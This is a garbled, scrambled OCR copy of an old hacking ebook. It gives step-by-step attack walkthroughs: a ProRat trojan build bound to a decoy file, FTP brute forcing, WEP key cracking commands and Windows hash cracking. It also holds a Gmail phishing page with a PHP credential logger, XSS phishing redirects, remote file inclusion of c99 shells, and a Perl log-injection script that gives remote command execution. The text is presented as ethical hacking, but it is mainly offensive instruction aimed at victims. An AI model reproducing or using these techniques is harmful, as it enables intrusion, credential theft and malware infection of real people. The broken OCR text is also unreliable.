The Hacker`s Underground Handbook
Contents
1. 59 4 Open CMD or Terminal and change into the directory with the exploit using the CD change directory command Then run the exploit by typing perl exploit pl The attack has begun Simple eh C WINDOWS system3 cmd exe perl exploit pl Microsoft Windows KP Version 5 1 2600 eG Copgeight 1985 2661 Microsoft Corp Documents and Settings David M gt cd Desktop Documents and Settings David M Desktop perl exploit pl Python Python is also a common programming language used in creating exploits You can download python from http www python org download The steps to running a Python exploit are just as easy as the ones for Perl See if you can get the exploit http milwOrm com exploits 3523 up and running Hint Python files end with py C C C C are the most popular programming languages used in developing exploit code Some C C code can be compiled with any compiler and on any operating system There are also C C scripts that are made to be compiled by a particular compiler or in a particular operating system You can usually find this information commented in the top of the script Below is a list of the most popular compilers for each operating system 60 Windows e Microsoft Visual C e Borland C e Dev C Mac e MrC MrCpp e Xcode Linux e GCC Most C C exploit code is made to be compiled in Linux If you wish to run one them but you re only option is Windows the2. The Hacker s Underground Handbook Learn What it Takes to Crack Even the Most Secure Systems By David Melnichuk http www learn how to hack net http www MrCracker com 1 Copyright Notice This report may not be copied or reproduced unless specific permissions have been personally given to you by the author David Melnichuk Any unauthorized use distributing reproducing is strictly prohibited Liability Disclaimer The information provided in this eBook is to be used for educational purposes only The eBook creator is in no way responsible for any misuse of the information provided All of the information in this eBook is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed In no way should you use the information to cause any kind of damage directly or indirectly The word Hack or Hacking in this eBook should be regarded as Ethical Hack or Ethical hacking respectively You implement the information given at your own risk Copyright 2008 Learn How To Hack net All Rights Reserved Introduction Programming A Eee Table of Contents How can use this eBook What is a hacker Hacker Hierarchy What does it take to become a hacker Disclaimer 1 Dol really need it 2 Where should I start 3 Best way to learn Passwords What is it Choosing a distribution Running Linux 4 1 2 3 4 Network Hacking Wir
3. scan Target way Larget site com Profile Intense Scan Command nmap T Aggressive A w ww bargek site com 2 Next the hacker would choose the Profile or in other words the scan type A smart hacker would go with a quick and quiet scan Full version detection scans are very loud and could raise suspicion on the other end Stay away from those options because as you will see later on there are other ways to get that information 51 Intense Scan X Intense Scan Operating System Detection Quick Full version Detection Scan Quick Operating System detection Quick Scan Quick Services version detection Quick and verbose scan Regular Scan 3 Asample scan result may look like the following H Fort 4 Protocol 4 State Service 4 Version 2 tcp open ssh 24 tcp open priv mail a 53 tcp open domain a0 tcp open http iii tcp open rpcbind 3506 tcp open mysql 4 As you Can see it found a few open ports and listed the services that are run on them Below have a list of some of the most popular ports services on the internet 20 FTP data File Transfer Protocol 21 FTP File Transfer Protocol 22 SSH Secure Shell 23 Telnet 25 SMTP Send Mail Transfer Protocol 43 whois 53 DNS Domain Name Service 68 DHCP Dynamic Host Control Protocol 80 HTTP HyperText Transfer Protocol 110 POP3 Post Office Protocol version 3 137 NetBlOS ns 138 NetBIOS dgm 139 N
4. 000147 107 2372008 17 01 15 PM 000145 107 2372008 17 01 15 PM 000146 10 23 2008 17 01 15 FM 000146 107 2372008 17 01 15 PM 000145 10 23 2008 17 01 15 FM 000148 107 2372008 17 01 15 PM 000150 10 23 2008 17 01 15 PM 0007 50 10 23 2008 17 01 15 PM 0007 52 107 2372008 17 01 15 PM 000152 107 2372008 17 01 15 PM 0007 54 10 23 2008 17 01 15 PM 000154 10 23 2008 17 01 15 PM 0001 54 10 23 2008 17 01 15 PM 000143 107 2372008 17 01 15 PM 000151 10 23 2008 17 01 15 PM 000151 10 23 2008 17 01 15 FM 000153 107 2372008 17 01 15 PM 000153 10 23 2008 17 01 15 FM 000155 10 23 2008 17 01 15 PM ras An SS Se a ae Ar All not logged in 127 0 0 1 331 Password required for admin not logged in 127 0 0 1 gt USER admin not logged in 127 0 0 1 gt 331 Password required for admin not logged in 127 0 0 1 gt USER admin not logged in 127 0 0 1 331 Password required for admin not logged in 1127 0 0 1 gt USER admin not logged in 127 0 0 1 331 Password required for admin not logged in 1127 0 0 1 gt USER admin not logged in 127 0 0 1 gt 331 Password required for admin not logged in 1127 0 0 1 gt USER admin not logged in 127 0 0 1 gt 331 Password required for admin not logged in 127 0 0 1 USER admin not logged in 127 0 0 1 gt 331 Password required for admin not logged in 127 0 0 1 USER admin not logged in 127 0 0 1 gt 331 Password required
5. 13 You are now back at the main page Here you will click CD DVD ROM F dep XR I p Details Snapshots Description A New Settings Delete Start Discard General Name Ubuntu Ubuntu pase Mo EE Powered Off Eur Video Memory 8 MB Boot Order Floppy CD DYD ROM Hard Disk ACPI Enabled 10 APIC Disabled YT x AMD Y Disabled PAE NX Disabled Hard Disks IDE Primary Master asdf vdi Normal 3 00 GB CD DYD R Not mounte Floppy Not mounted hp Audio Disabled EP Network Adapter 1 PCnet FAST III NAT D Serial Ports Disabled USB Disabled Shared Folders None Remote Display Disabled 14 Check Mount CD DVD Drive and choose ISO Image File 7 Ubuntu Settings General CD D D ROM Hard Disks CD DYD Rom Mount COYDYD Drive Floppy Host COIDVD Drive Network Enable Passthrough GH VeurLoecm Serial Ports 150 Image File USB Shared Folders Remote Display Invokes the Virtual Disk Manager to select a CD DVD image to mount A Invalid settings detected 28 15 If you downloaded the Ubuntu image file in the beginning locate it and select it If you haven t downloaded it yet go to the beginning of this chapter where have a step by step guide Virtual Disk Manager F Select a CD DVD ROM disk image file Look in e Linus da t fe i eq Ubuntu 8 04 1 desktop i386 My Recent Documents E Desktop hy Documents hy Computer My Network File nam
6. 73 4 Once you find an access point open a text document and paste in the networks broadcast name essid its mac address bssid and its channel number To get the above information use the arrow keys to select an access point and hit lt ENTER gt to get more information about it ee k T W Ch Packts Flags IP Range 5 The next step is to start collecting data from the access point with airodump Open up a new terminal and start airodump by typing in the command airodump ng c channel w filename bssid bssid device In the above command airodump ng starts the program the channel of your access point goes after c the file you wish to output the data goes after w and the MAC address of the access point goes after bssid The command ends with the device name Make sure to leave out the brackets 6 Leave the above running and open another terminal Next we will generate some fake packets to the target access point so that the speed of the data output will increase Put in the following command aireplay ng 1 0 a bssid h 00 11 22 33 44 55 66 e essid device In the above command we are using the airplay ng program The 1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point The O cites the delay between attacks a is the MAC address of the target access point h is your wireless adapters MAC address e is the name essid of the target a
7. Before get into the example you must first know what an FTP server is FTP stands for File Transfer Protocol FTP is a simple way to exchange files over the internet If a hacker got FTP access to my website he could delete upload anything he wants on my server An FTP address looks similar to a website address except it uses the prefix ftp instead of http set up an FTP server on my computer so could demonstrate You can get Brutus at http www hoobie net brutus 1 First the hacker would choose a target In this case it s my home computer and the IP address for your home computer is 127 0 0 1 2 By going to ftp 127 0 0 1 get a pop up box asking for a username and password 35 Authentication Required 7 Enter username and password For ftp 127 0 0 1 User Name Fassword 3 Nextthe hacker would launch a program similar to Brutus and attempt to crack the password x Brutus AETZ www hoobie net brutus January 2000 File Tools Help Target 127 0 0 1 Type Stop Clear Connection Options Part 21 Connections D 10 Timeout 60 ii FTP Options be Modify sequence Tr to stay connected for Unilimite attempts Authentication Options W Use Username Single User Fass Mode Word List User File users tet Browse Pass File words txt Browse Positive Authentication Results 4 Inthe target you put the IP address of the website and to the right select the app
8. General Settings Bind with File Server Extensions Server con Server Size 342 Kbayt Server Port Server Password EATS Victim Hame victim bee Give a fake error message Melt server on install P KILA F on start Ed Disable Windows XP SP2 Security Center Ed Disable Windows XP Firewall Ed Clear windows sP Restore Points Don t send LAN notifications from 192 168 or 10 L lrvigibility PF Hide Processes from All Task Managers 92k sF PF Hide Values From All kind of Registry Editors 9r 2ksF F Hide Names From Macontig Sek P PF UnTermimnate Process 2k FP Create Server 6 Click on the Bind with File button to continue Here you will have the option to bind the trojan server file with another file Remember a trojan can only be executed if ahuman runs it So by binding it with a legitimate file like a text document or a game the chances of someone clicking it go up Check the bind option and select a file to bind it to In the example will use an ordinary text document 97 Create Server Notifications hee Eind server with a file General Settings Selectric This File will be Binded Bind with File Server Extensions N Server loon 4 Help Server Size 342 Kbayt Lookin Decken RM OE Elm Documents My Computer Elmy Network Places Bi mozilla Firefox C ProRat v1 9 E Funny Joke File name Funny Joke e 7 Click on the Server Ex
9. Saas R Downloader Printer Online Editor ProConnective Create Start button is hidden 14 The image below shows the message would get on my screen if the hacker chose to message me ProRat V1 9 Connected 127 0 0 1 PROHACHA NET PROFESSIOHAL INTERNET N Ip Port SN P _icomest AE p _ a o DY wos u g Help x amp h Admin F TP Funny Stuff I File Manager Yes No Control Panel Registry Uk Cancel Shut Down PC Screen Shot lad Cancel Retry Clipboard Give Damage Passwords Message Box tle uit iat T R Downloader Message Box Tex REEDED Printer Services Online Editor ProConnective Explorer Search Files Create Message sent 101 15 Below is an image of my task bar after the hacker clicks on Hide Start Button Prokat V1 9 16 Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen Screen Shot Ehe hos uct Bhan Span ic Hees gl pk A Et way E i Start Bi For UL Picture quality show in fullecreen 3 Help Screen Shat Method Screen Shoat Method WebCam Shot Method WebCam Shot Method Eh A Methodz 102 As you saw in the above example a hacker can do a lot of silly things or a lot of damage to the victim ProRat is a very well known trojan so if the victim has an anti virus program installed he most likely won t get infected Many skilled hackers can program their own viru
10. david Password Desktop Environment EITITTITTITTOTT Ubuntu TTTTTTITITTITTT Accessibility Install 21 4 Wait for it to fully install and hit finish Simple eh Ubuntu Setup Installing Ubuntu 8 04 1 Please wait while Ehe required Files are retrieved and prepared 159 5 MB 21 9 of 728 2 MB Cancel Ubuntu Setup a G A Completing the Ubuntu Setup Wizard Please remove any CD DVD and reboot to complete the installation Reboot now CT want to manually reboot later 22 5 Reboot the computer Before Windows loads a screen will come up that gives you an option to boot into Windows or Ubuntu Arrow down to Ubuntu and hit lt ENTER gt 6 Ubuntu will begin to load Since this is your first time starting Ubuntu it will install and configure a bunch of things and restart again 7 Boot into Ubuntu again and you re good to go VirtualBox This is by far my favorite way to run any Linux distribution if just want to try it out With VirtualBox you can run Linux within a Windows or Mac computer 1 First download VirtualBox at http www virtualbox org wiki Downloads Install it Open it up and click New on the top T Sun xVM VirtualBox File Machine Help D MN Settings Delete Scart Discard Hit Next i Create New Virtual Machine Welcome to the New Virtual Machine Wizard This wizard will guide you through the steps that are necessary ko create a new
11. hi 3 Now we will insert JavaScript Search for lt script gt alert hi lt script gt if the word hi pops up in a popup box then the site is vulnerable to XSS fecript alert hi els cript gt 4 As you can see these examples are non persistent Now if a hacker found a guestbook or something else like it that was vulnerable he would be able to make it persistent and everyone that visits the page would get the above alert if that was part of his comment Hackers knowledgeable in JavaScript and PHP will be able to craft advanced XSS attacks to steal your cookies and spread XSS worms but to show you a simple example of something more realistic then the above examples will show you how a hacker could use XSS to help with phishing 1 Let s say a hacker wants to phish passwords from www victim site com If he was able to find an XSS vulnerability anywhere on the website he would be able to craft a link pointing to the legit website that redirects to his phishing website 106 Inthe example with the popup when inserted the JavaScript into the search box a URL was formed that looked like the following http localhost Form php searchbox lt script alert hi lt 2F script gt amp search Search Here you can see that the code you typed into the search box was passed to the searchbox variable Inthe URL the hacker would then replace everything in between searchbox and amp search with t
12. to the end of every included file So if you included the shell it would end up looking like c99 txt php and not work To get around this you would add a null byte 00 to the end of c99 txt This tells the server to ignore everything after c99 txt 7 In step one told you that hackers use Google dorks to look for sites possibly vulnerable to RFls An example of a Google dork 108 would be allinurl php page This looks for URL s with php page in them This is only an example and you most likely won t find any vulnerable sites with that search You can try switching around the word page with other letters and similar words Hackers usually search vulnerability databases like www milwOrm com for already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork 8 If the hacker succeeds in getting the server to parse the shell he will be presented with a screen similar to the following IC99Shell v 1 0 beta 9 06 2005 Software Apache PHP 4 4 7 uname a Linux server netkosmos com 2 6 19 2 5 grsec 1 Fri Jun 8 11 04 05 CEST 2007 i686 uid 99 nobody gid 99 nobody groups 99 nobody Safe mode home hwg80fp6 public_html news admin inc drwxr xr x Free 48 4 GB of 70 19 GB 68 95 Hor Bat For UP Re Se Bu ii aa Ea ith ta eh Bu Extraz Encoder Bind Proc FIP brute Sec SQL PHP code Feedback Self remove Logou
13. at the Nmap manual http nmap org book man html Now that the hacker has got all the running services and open ports on the targets system he will now have to find out what versions the server is running This is where Banner Grabbing comes in 53 Banner Grabbing Now that the hacker has a full list of services running on the target system to be able to exploit them he has to first figure out what software and version the service is One way the hacker can get this information is to telnet into service port In the example below we will use command prompt on Windows Start gt Run gt Type cmd gt Enter If you are on a Mac you will be using the terminal Note If you are using Windows Vista then telnet is not installed by default You can install it by doing the following simple steps Click Start then select Control Panel Select Programs and Features Select Turn Windows features on or off Select the Telnet Client option and click OK A box will appear to confirm installation The telnet command should now be installed O O O 1 First the hacker would choose one of the open ports that were revealed in the Nmap scan to continue with and attempt to exploit Let s say that when the hacker scanned his target he found the port 21 open As you can see on the chart above port 21 is FTP To find out what FTP software is running he would use telnet by running the command c CAWINDOWS system32 cmd
14. being a target of NetBIOS attacks simply disable file and printer sharing In Windows Vista it is disabled by default but you must do a little work in Windows XP e Go to Start gt Control Panel gt Network Connections e Double click on your active connection In my case it is the Wireless Network Connection 2 e Click on Properties e If File and Printer Sharing is selected deselect it and click OK LAN or High Speed Internet r onmection A Wireless Network Connection 1394 T tion 2 Wireless Network C tion 2 ede oe a Connected Firewalled Lg 1374 Net Adapter T ty NETGEAR WG111 802 119 Wir General Connection Status Connected Hetbwork Enter ndGetHacked Duration 01 08 43 Speed 1 0 Mbps Signal Strength alll Activity Receved 16 306 226 616 649 425 Disable View Wireless Networks 91 Wireless Network Connection 2 Properties m K General Wireless Networks Advanced Connect using NETGEAR WG111 802 119 Wireless Eiri QoS Packet Scheduler W Network Monitor Driver IE Ill Install Uninstall Description da File and Printer Sharing for Microsoft Networks Allows your computer to access resources on a Microsoft network Show icon in notification area when connected Notify me when thi
15. does he go about running it against the target and penetrating the server This will all be explained in this chapter As you search MilwOrm or any of the other couple exploit database websites provided in this chapter you will notice that the exploits are created in many different types of programming languages Below will list a few of the most common programming languages used and how a hacker would compile and run them against a server PHP PHP exploits are very common PHP exploit code usually starts with lt php and ends in gt Let s say the hacker wanted to do some temporary damage to a server running FTP Server 0 9 20 If he was to search milwOrm he would come up with the following DOS exploit http milwOrm com exploits 2901 and run it against the server Below are the steps the hacker would take 1 First the hacker would need to install PHP onto his computer WAMP is a free web server that comes with PHP If you are using a Mac then you must install MAMP Next paste the PHP exploit into notepad or any word processor and save it as exploit php 57 You will have to know a little PHP to edit the target address On line 13 of this exploit you will see Saddress gethostbyname 192 168 1 3 here you will have to edit in the IP address of the target Every exploit is different Some you have to know what to edit and some have runtime instructions Save this edited file into the PHP directory on your se
16. etc passwd file If the hacker is able to successfully get to the etc passwd file he would see a list similar to the one below Root x 0 032 r0oot bin bash bins271213bin r bins bin ralse daemon x 2 2 daemon sbin bin false adm x 3 4 adm var log bin false 1Pp x 4 7 1p var spool lpd bin Talse sync x 570 syncs sbin bin sync 110 shutdown x 6 0 shutdown sbin sbin shutdown Walt ess Tesha lti sbin Sbin7 hale Each line is divided into seven parts username passwd UserID GroupID full_ name directory shell If the password hash was shown the hacker would be able to crack it and get access to the machine but in our case the password isn t shown This means that the password is shadowed and in the etc shadow file which the hacker doesn t have access to If this was the case the hacker would probably attempt to get access to the system another way through log injection The log directories are located in different areas in different Linux distributions Below is a list of the most common locations apache logs error log apache logs access log apache logs error log apache logs access log apache logs error log apache logs access log etc httpd logs acces_log etc httpd logs acces log etc httpd logs error_log etc httpd logs error log var www logs access_log var www logs access log usr local apache logs access_ log usr local apache logs access log var log apache acces
17. exe Microsoft Windows AP Version 5 1 2600 CG Copyright 1985 2661 Microsoft Corp C Documents and Settings David M gt telnet localhost 21 As you can see above ran this against my computer localhost So a hacker would insert a target URL in place of localhost 54 2 Next it would connect to the target and display a banner telling the hacker the software and its version as shown below This is the information the hacker needs to continue and begin searching for vulnerabilities for the software discovered ec Telnet localhost 220 FileZilla Server version 4 9 27 beta 2H uwritten hy Tim Kosse Tim KosselPgmx de gt 28 Please visit http sourceforge net projects filezilla If the above method doesn t work for you then simply use Nmap s full version detection option to get the information Searching for Vulnerabilities Now that the hacker has the name of the software being used and its version number he would take that information and search a couple vulnerability databases for an exploit If there s an exploit available he will run it against the server and take complete control If there isn t any he would move onto another open port and try again on a different service Some of the most popular exploit databases are e MilwOrm e SecurityFocus e osvdb 55 By searching filezilla on milwOrm fortunately the hacker won t find any exploits for my current version of
18. for admin not logged in 127 0 0 1 gt PASS 9 not logged in 127 0 0 1 gt 530 Login or password incorrect not logged in 127 0 0 1 PASS not logged in 127 0 0 1 PASS not logged in 127 0 0 1 530 Login or password incorrect not logged in 127 0 0 1 PASS 9 not logged in 127 0 0 1 gt 530 Login or password incorrect not logged in 127 0 0 1 PASS not logged in 127 0 0 1 gt 530 Login or password incorrect not logged in 127 0 0 1 PASS not logged in 127 0 0 1 gt 530 Login or password incorrect not logged in 127 0 0 1 gt PASS 9 not logged in 127 0 0 1 gt 530 Login or password incorrect not logged in 127 0 0 1 deconnected not logged in 127 0 0 1 gt 530 Login or password incorrect not logged in 127 0 0 1 PASS 9 not logged in 127 0 0 1 530 Login or password incorrect not logged in 127 0 0 1 gt PASS 077 not logged in 127 0 0 1 530 Login or password incorrect not logged in 127 0 0 1 PASS 9 ID Account IF Transfer 00166 not logged in 127 001 000167 inot logged in 127 0 0 1 000168 inot logged in 127 0 0 1 s 0001659 inot logged in 127 0 0 1 000170 inot logged in 127 0 0 1 000171 inot logged in 127 0 0 1 000i Fz inot logged in 127 0 0 1 000173 inot logged in 127 0 0 1 000174 inot logged in 127 0 0 1 _ 000175 inot logged in 127 0 0 1 38 11 In place of the IP
19. ies sect cs E ocean consider requesting 2 CD Case Studie Me Buy on CD or DYD Buy a CD or DYD with Ubuntu Edubuntu or Kubuntu CD or a large number of CDs ae from a distributor near you If you are in North America you can get Ubuntu and Kubuntu on DYD from of Get Ubuntu Amazon com Ff Get Support Request a free CD Request a free Ubuntu Edubuntu or Kubuntu CD fram Canonical Delivery typically takes 6 10 weeks e Use each CD as many times as you like you are free to use it on as many computers as you wish and to pass on to others Learn more by visiting the Shipit Questions page Get Involved F Get Developing 14 gt Products gt Support gt Community gt Partners News Search Get Certified Get Ubuntu learn more You are here Home Get Ubuntu Download Ubuntu The fastest way for most people to get Ubuntu is by downloading the CD Installer The CD Installer is nearly 700MB If you Download don t have a fast internet connection you may want to consider requesting a CD Purchase _ gt Request CDs Download Ubuntu Buy Ubuntu on CD Request free CDs Release Notes Upgrading Which release do you want Ubuntu 8 04 LTS Desktop Edition Supported to 2011 O Ubuntu 3 04 erver Edition Supported to ZU Countdown Mirror Ubuntu sneceeneccscssssasssssssssssessssssesssssssssssessssssenessessssssssssssssssssssssesesssssess
20. ports It may take long if you want to scan too many ports Cancel 5 Click start The program will begin scanning and when it s complete a box with the results will come up Rogry IP Scanner a IFF PFAHER Scanning finished 44 sec 0 196 zec host 192 168 1 1 192 169 1 224 IPs scanned eed Alive hosts With open ports 1 Ports scanned 1 host 1 total 6 As you can see 224 Ips were scanned Out of those only one was alive and luckily it has port 139 open 81 IP Di 192 168 1 99 132 168 1 30 132 168 1 31 132 168 1 32 192 163 1 93 132 168 1 34 192 168 1 95 132 168 1 36 132 168 1 37 192 169 1 98 132 168 1 33 132 168 1 100 192 168 1 101 132 168 1 102 Fing Dead Dead Dead Dead Dead Dead Dead Dead Dead Dead Dead Dead 0 ms Dead w t Hostname Wi MeS NS MS NS NS MS MS MS MS MS MS MS davids machine MS 7 Open the Command Prompt by going to Start gt Run gt Type in cmd gt lt ENTER gt 8 Now the hacker would run the nbtstat a TargetIPaddress this will tell us if the target has file and printing enabled Without it this attack is not possible o CRWINDOWS system32 cmd exe Microsoft Windows AP Version 5 1 2660 CC Copyright 1985 2001 Microsoft Corp C 5 Documents and bettings Dayvid M nbtstat a 192 168 1i i i Mireless Network Connectio
21. the steps a hacker would take to exploit this type of vulnerability in a website 1 First the hacker would find a website that gets its pages via the PHP include function and is vulnerable to RFI Many hackers use Google dorks to locate servers vulnerable to RFI A Google dork is the act of using Google s provided search tools to help get a specific search result 2 Website that include pages have a navigation system similar to http target site com index php page PageName 3 To see if athe page is vulnerable the hacker would try to include a site instead of PageName like the following http target site com index php page http google com 4 Ifthe Google homepage shows up on the website then the hacker knows the website is vulnerable and would continue to include a shell 5 Acouple of the most popular shells are c99 and r57 A hacker would either upload them to a remote server or just use a Google dork to locate them already online and insert them To find the a shell the hacker would search Google for inurl c99 txt This will display many websites with the shell already up and ready to be included At the end of the URL make sure to add a so that if anything comes after c99 txt it will be passed to the shell and not cause any problems The new URL with the shell included would look like http target site com index php page http site com c99 txt 6 Sometimes the PHP script on the server appends php
22. we will be running PWDUMP to obtain the password hashes Make sure all of your anti virus and anti spyware programs are disabled because most anti virus programs mistake PWDUMP for a malicious program since it accesses the system files If you don t disable the anti virus program PWDUMP will fail in retrieving the hashes 6 Click Load and select Local SAM This will load all the password hashes for all the users on your computer and display them Progress Statistics Preferences User LM Hash MT Hash LM Pd 1 LM Pwd 2 MT Frad Administrator 116F7B7 120555 Bob Fac 1E43CDE1 1BF35407FF7D4 empty David M 11BF7E71208553 Guest Si d 6cheOdi6ae empty Helpassistant Bee s91COCe408 461 72F9E4491477 Pushkin SDO501050E394 Fe950202 46146 SUPPORT 35594 DAUSBUB4E1 356 7 Next click Crack and the program will begin to crack the password hashes 8 Once the program finishes cracking you should see a screen similar to the following ophcrack x Iesvs c Load Delete Save Tables Crack Help About Progress Statistics Preferences User LM Hash MT Hash LM Fiwd 1 LM Pid 2 MT Pad Administrator 1 1BF7B7 120858 not Found Bob FeCSLIES SCDE1 IBFSS4D FF O4 LOLCATS empty lolcats David M 11EF7E7120858 not Found Guest Sid cfe0d16ae empty HelpAssistant B6SS91CDC8408 48172F9E449147 not Found not Found nok Found Pushkin SDOSOLDS0ES94 Fegob20246C46 CHRISTM ASO Christmas SUPPORT 356
23. 0 71 148736 861 146944 D7 1464327 50 145920 FO 180736 DE 148736 441147968 521147958 ES8 147712 EFC 146688 9A 1459270 8D 173568 881154112 D4 148480 44 147968 561 147200 74 146176 FOL 146176 C9 176128 62 146176 3F 1459270 9F 145920 87 145408 SE 144384 AB 144384 E4 174336 F7 151296 BE 149760 6B 148224 F2 146432 42 146176 46 145920 89 154880 82 153600 SE 15308 26 150528 56 149760 031148488 1E 147968 F2 170240 6A 148724 DAL147456 6241456688 7711455688 DE 145970 260 144896 11 179456 38 153600 _9D 146688 A9l 145664 7AL145408 85 145152 5 14515 A7L 151552 AC 149504 6F 147968 E31 1464327 34 145176 BD 146176 OD 151040 566149504 CE 148736 COL 148480 321146176 80 145664 7E 145408 98 152576 97 151284 25 145800 FBC 145720 481145732 D8 144584 Col 144184 1 7 3 4 C a u u eg u eg ge KEY FOUND 70 90 85 F9 8D C9 E4 89 F 11 C5 49 98 With all the different computers and network adapters out there you may come across a error occasionally If you get stuck remember Google is your friend Search for an answer and guarantee you that 99 of the time you will find a solution 75 Packet Sniffing will be using the program Wireshark do demonstrate packet sniffing Packet sniffing is the act of capturing packets going through a network With a packet sniffer once a hacker gains access to wireless network he could intercept private information goin
24. 3C 20passthru S_GET cmd 20 3E 5 When you submitted the script the browser automatically encoded the URL Luckily there is a pearl script that can get around this problem Below is the pearl script edit the variables Ssite Spath Scode and Slog to the appropriate information usr bin perl w use IO Socket use LWP UserAgent Ssite www vulnerablesite com Spath code lt Passthru _GET cmd gt Slog etc httpd logs error_log print Trying to inject the code Ssocket IO Socket INET gt new Proto gt tcp PeerAddr gt site PeerPort gt 80 or die nConnection Failed n n print socket GET path code HTTP 1 1 r n print socket User Agent code r n print socket Host site r n print socket Connection close r n r n close socket print nCode code successfully injected in log n print nType command to run or exit to end cmd lt STDIN gt while Scmd exit Ssocket IO Socket INET gt new Proto gt tcp PeerAddr gt site PeerPort gt 80 or die nConnection Failed n n print socket GET path index php filename log amp cmd cmd HTTP 1 1 r n print socket Host site r n print socket Accept r n print socket Connection close r n n while show lt
25. 5016066964 Veste s wireless network Ti Mbps Adywanced Mult E O04005CEFERC madhu c Mbps D Link H O00904EI1ER6E wireless 1I Mbps Gemtek D Link II kbps Delta Netgear Type Eneryption ha OIIAR24RIC Wireless z wg O004E 20EF2CE OECD 000956230706 000935B247AD2 amp 00095BI09FI8 0030ABOFC97I a Encryption Off Eneryptian On K ESS AP N BSS Peer i CF Pollable E Short Preamble g Detault SSID i FEOT K Channel Agility 1 000956232555 000956J9B51EA 0050F2732F 06 1 000454 0FFA20 I 003048 1F6FFC Id 00055 DECAAS2 000956230901 000625978854 000625004234 00C002CDAIDE 000956113866 Wireless vwishokha WIRELESS linkays Tsunami Shevealert manju eyehorre MEEA ONAFE SpeedSteam wireless MAZARETH gaiena Welesg link sys call linksys shreya HOME 1 1 1 3 1 b p 7 b 1 6 6 6 1 2 b 1 4 1 6 1 6 1 b 3 7 b 1 1 TI Mbps 11 Mbps 11 Mbps 11 Mbps 11 Mbps 22 Hbps 11 Mbps 11 Mbps 11 Mbps 11 Mbps 11 Mbps 11 Mbps 11 Mbps 11 Mbps 11 Mbps 54 Mbps 11 Mbps 11 Mbps 11 Mbps 11 Mbps 48 Lidl Netgear Heigenr Microsoft Linksys Deka Netgear D Link Cisco Aironet Linksys Linksys Sercomm Linksys Delta Neigear D Link Netgear Linksys Linksys Linksys Linksys Sercomm DDH DH DH HTS HSH SDD DDD Netgear aim GPS Desabled 4 If you click on the MAC address of one of the discovered wirele
26. 894 DADSBUBAB1 SSB not Found Table Directory Status Progress xF free fast C Downloads Ra 100 in RAM FE EEE a _ Freioad done Brute Force done Pwd Found at Time elapsed Oh im 495 88 9 As you can see two out of three of my account passwords were cracked ina matter of a couple minutes e Bob lolcats e David M not found e Pushkin Christmas02 Ophcrack LiveCD The next method to crack the Windows hashes will show you is through an ophcrack LiveCD 1 Go to the ophcrack website and choose the correct operating system LiveCD to download 2 With the downloaded ISO create a LiveCD the same way you did with the Ubuntu LiveCD in the Linux chapter 3 Put the CD in your CD Drive and restart to boot from the CD 4 You will see the following screen ophcrack LiveCD Tfal TE Ophcrack Graphic VESA mode OBJECTIF SECURITE 5 1 Text mac Architecte de la s curit informatique 89 5 Hit lt ENTER gt or wait six seconds to boot into the Ophcrack Graphic mode If something goes wrong and the screen won t show the Graphics restart and go into the Ophcrack Graphic VESA mode If this also fails go into Ophcrack Text mode 6 Once it ophcrack loads completely it will automatically get your Windows password hashes and begin the cracking process 90 Countermeasures There are a couple things you can do to prevent NetBIOS and Ophcrack password cracking attacks 1 To keep computer from
27. Read small on your mobile phone by pointing your phe Save im C Gmail M p eg M E My Recent Documents Ls Desktop hy Documents i hy Computer File name Semscelogin lae My Network Save as lype Web Page complete vi 3 Once you have it saved rename ServiceLogin htm to index htm The reason you want to name it index is so when you upload it to a web host and someone goes to your link the index page is the first page that Shows up 4 Next the hacker would create a PHP script to do his dirty deed of steeling your information Below is a simple PHP script that logs and stores your login details when you click Sign in To see how it works copy and paste the following code into notepad Next save it into the Same directory as you saved the Gmail page and name it phish php In addition to the phish php page create a new empty text file and name it list txt 42 lt php This marks the beginning of the PHP script Header Location https www google com accounts ServiceLogin service mail amp passive true amp rm false amp continue http 3A 2F 2Fmail google com 2Fmail 2F 3Fui 3Dhtml 26zy 3Dl amp bsv 1k96igf4806cy amp ltmpl default amp itmplcac he 2 once you click Sign in in the fake website this redirects you to the real Gmail website making the whole process look more legit Shandle fopen list txt a this tells the server to open the file list txt and
28. Ssocket gt print show print Type command to run or exit to end 112 cmd lt STDIN gt 6 Once the hacker runs this script and it goes successfully he will be able to run any command on the server From here he can run any local exploits to gain root or just browse the server files 113 Chapter Ten Conclusion 114 Congratulations You ve made it through the whole course With this course you have been introduced to many categories in the vast subject of hacking By now you should be craving for more knowledge So what now Keep Learning That s right Keep learning Choose your favorite topic in this e book and begin to learn more about it Eventually when you master it continue to another One of the biggest mistakes notice with new and intermediate ethical hackers is that they want to know everything at once They go out and jump from topic to topic Time passes by and they still don t know enough about anything know went through this phase as well Trust me One of the best ways to learn is to purchase books on your topic subscribe to related blogs and join ethical hacking communities Below is a list put together of some of the best hacking related websites on the internet e HackThisSite Great site for continued learning in web hacking e HellBound Hackers Another mainly web hacking related website e Astalavista Astalavista is a community full of security prof
29. USB2 0 Adapter Microsoft s Packet Scheduler Capturing File Edit wiew Go Capture Analyze Statistics Help Qt fF siigiBl Qaaae Filter msrms Expression Clear Apply a Elze Seele er eu7 46 27 534 BEINE MSG 6 N 144 1919 32 026485 192 1658 1 101 207 46 27 34 MENMS MSG 9 U OO 2209 36 504746 192 168 1 101 207 46 27 34 SMS MSG 10 N 145 2210 36 682595 207 46 27 34 192 168 1 101 MENMS MSG smarterchildahot 3050 55 059227 207 46 107 80 192 168 1 101 MSNMS NLM Awy sean spotlig S109 56 038464 207 46 107 80 ee oes ee LOE SMS UBS sean spotlightph E Frame 1326 206 bytes on wire 209 bytes captured Ethernet II Src Netgear_70 5e b 00 07 55 70 5e 0b7 Dat Cisco Li_f4 07 65 Coo dc 41 f Internet Protocol Src 192 158 1 101 192 158 1 101 ost 207 46 27 34 207 46 27 34 Transmission Control Protocol src Port 7601 7601 Dst Port msnp 15553 Seq 1105 Acl MSN Messenger Service MSG 8 N 142 r4yn MIME Version L ayrn Content Type text plain charset UTF 84r n x MMS IM Format FN MS 2 shell amp 20olg EF co 0 CS 0 PF 0 r n PAN EEE 6 As you can see my message is displayed at the bottom If continue down the list can see the whole conversation Usernames and passwords are captured the same way and if they aren t encrypted you can see them in plain text Some other useful sniffing programs to learn e WinDump e Snort e Dsniff 77 Countermeasures There are a few countermeasures
